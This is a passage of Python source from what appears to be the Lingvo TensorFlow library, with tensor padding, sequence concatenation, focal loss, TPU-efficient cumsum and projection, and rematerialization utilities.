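#   padded = PadSequenceDimension(x, length=10, pad_val=0.)  # -> [4, 10, 16]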
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, broadcast=True, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
    # Equiv to ApplyPadding(padding, x)
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must be the same shape as 'x' if specified.
broadcast: Whether to broadcast the padding shape to the shape of 'x'. You
almost certainly want this to be true as it matches how padding would be
expanded if applied arithmetically.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.math.logical_or(
tf.equal(padding, 0.0), tf.equal(padding, 1.0))), [padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros_like(x)
if broadcast:
# Broadcast padding to the full shape.
padding = tf.cast(padding, x.dtype) * tf.ones_like(x)
return tf.where(padding > tf.zeros_like(padding), padded, x)
else:
result = x * tf.cast(1.0 - padding, x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
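# Illustrative sketch (not part of the original code): masking padded positions
# of an activation tensor, where `paddings` is [batch, time] with 1.0 at padded
# positions and `acts` is [batch, time, dim] (placeholder names).
#
#   masked = ApplyPadding(paddings[:, :, tf.newaxis], acts)
#   # Padded positions of `masked` are 0; unpadded positions equal `acts`.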
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements equal to the last cumsum value gives us
# num_trailing_padded + 1, so the count of differing elements is length - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
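# Example (hypothetical usage sketch): trailing padding is ignored, while any
# leading padding still counts toward the reported length.
#
#   paddings = tf.constant([[0., 0., 1., 1.],
#                           [1., 0., 0., 1.],
#                           [1., 1., 1., 1.]])
#   LengthsFromPaddings(paddings)  # -> [2, 3, 0]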
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverses the unpadded portion of `inputs`. It assumes inputs are only
padded at the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.math.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lenghts as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
# input0 and input1 should have the same batch size and the same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.cast(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
input1_seq_dim = tf.cast(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(
seq_length0,
tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(
seq_length1,
tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1; we can simply
# concatenate the reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
pad_after_contents: Whether to pad and trim after the original contents
of each dimension.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s (for padding/trimming %s) must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
if pad_after_contents:
# If dim_i is less than shape[i], pads after contents.
paddings = tf.stack([zeros, pad], axis=1)
# If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
slice_begin = zeros
else:
# If dim_i is less than shape[i], pads before contents.
paddings = tf.stack([pad, zeros], axis=1)
# If dim_i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
# for dim_i.
slice_begin = tf.shape(x) + pad - shape
x = tf.pad(x, paddings, constant_values=pad_val)
x = tf.slice(x, slice_begin, shape)
return tf.reshape(x, shape)
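# Example (hypothetical usage sketch): pad up or trim down to a fixed shape.
#
#   x = tf.ones([2, 3])
#   PadOrTrimTo(x, [2, 5], pad_val=0)  # shape [2, 5], two zero columns added.
#   PadOrTrimTo(x, [1, 2])             # shape [1, 2], contents trimmed.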
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
# [[1, 1, 2, 2, 3, 3], [4, 4, 5, 5, 6, 6]]
# As a comparison, tf.tile(x, multiples=[1, 2]) gives:
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stack.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probabilistic sample from the inputs proportional to the weights. The
return type will be the same as the return type of the individual 'fn' from
the inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
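# Example (hypothetical usage sketch): mix two input pipelines 90/10; only the
# selected callable's ops are evaluated for a given draw.
#
#   def ReadA():
#     return tf.constant(1)
#   def ReadB():
#     return tf.constant(2)
#   sample, source_one_hot = MixByWeight([ReadA, ReadB], weights=[0.9, 0.1])
#   # `sample` is 1 about 90% of the time; `source_one_hot` marks the source.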
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case where the input "params" is not an instance of
# hyperparams.Params, e.g. when UpdateFpropDtype is called recursively for
# all the items in the "sub" list of SequentialLayer (see the 1st elif below).
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case where the input "params" is not an instance of
# hyperparams.Params, e.g. when UpdateDtype is called recursively for all the
# items in the "sub" list of SequentialLayer (see the 1st elif below).
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
def Backward(op, *dy):
"""The backward function that rematerializes forward outputs."""
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.math.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
# Skip op.inputs[0] which is initial_step_seed.
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in op.inputs[1:]]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
ResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=dy)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return (tf.zeros_like(initial_step_seed),) + tuple(dxs_final)
xs_dtypes = [x.dtype for x in xs]
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
@tf.Defun(initial_step_seed.dtype, *xs_dtypes, python_grad_func=Backward)
def Forward(initial_step_seed, *fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*fwd_xs)
# Some sanity check.
assert not GetExtraInputs()
assert not GetExtraArgs()
assert not GetExtraVars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = Forward(initial_step_seed, *xs)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
ResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = {
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
}
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
Stateful random number generator ops should be avoid in Recurrent() call.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if not isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
raise tf.errors.InvalidArgumentError(None, None,
'func is not a _DefinedFunction.')
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None,
'Defun {} is not in the graph.'.format(func.definition.signature.name))
stateful_ops = []
# Recursively search for stateful random op.
nodes = py_collections.deque(func.definition.node_def)
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.op)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
else:
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
def _ToPlaceholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
return nmap.Transform(_ToPlaceholder)
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
if gamma is not None and gamma != 0:
probs = tf.exp(-loss)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
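# Example (hypothetical illustration): with gamma > 0, confident (easy)
# predictions contribute much less loss than under plain cross-entropy.
#
#   logits = tf.constant([[4.0, -4.0]])  # confident and correct.
#   labels = tf.constant([[1.0, 0.0]])
#   SigmoidCrossEntropyFocalLoss(logits, labels)             # plain CE.
#   SigmoidCrossEntropyFocalLoss(logits, labels, gamma=2.0)  # strongly down-weighted.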
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
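# Example (hypothetical usage sketch):
#
#   RecordFormatFromFilePattern('tfrecord:/path/to/bar*')
#   # -> ('tfrecord', '/path/to/bar*')
#   RecordFormatFromFilePattern('/path/without/prefix')
#   # -> ('sstable', '/path/without/prefix')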
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the REDACTED workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('third_party/py/lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
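# Example (hypothetical illustration of the trick above): an inclusive cumsum
# along an axis is a matmul with a 0/1 mask where mask[k, j] = 1 iff k <= j.
#
#   x = tf.constant([[1., 2., 3.]])
#   mask = tf.constant([[1., 1., 1.],
#                       [0., 1., 1.],
#                       [0., 0., 1.]])
#   tf.tensordot(x, mask, axes=[[1], [0]])  # -> [[1., 3., 6.]]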
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU-efficient implementation that avoids reshaping the inputs to a
rank-2 tensor by using einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
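# Example (hypothetical illustration of the einsum form used above): for a
# rank-3 input the equation becomes 'aby,yz->abz', so no reshape is needed.
#
#   inputs = tf.random.uniform([8, 10, 16])
#   weight = tf.random.uniform([16, 32])
#   tf.einsum('aby,yz->abz', inputs, weight)  # -> shape [8, 10, 32]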
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
# TODO(zhifengc/huangyp): Consider implementing an assert_equal
# op replacement for lingvo, as assert_equal doesn't support strings on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
# pylint: disable=unused-argument
def NoOP(*args, **kwargs):
return tf.no_op()
# pylint: enable=unused-argument
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
yield
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _DefineDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A NestedMap w/ fields:
defun: A tf.Defun that wraps fwd
args: A Nested Structure of tf.DType
rets: A Nested Structure of tf.DType
"""
assert fwd is not None
# fwd signature (tf.Tensor dtypes).
get_dtype = lambda x: x.dtype
sigs = NestedMap(args=Transform(get_dtype, args))
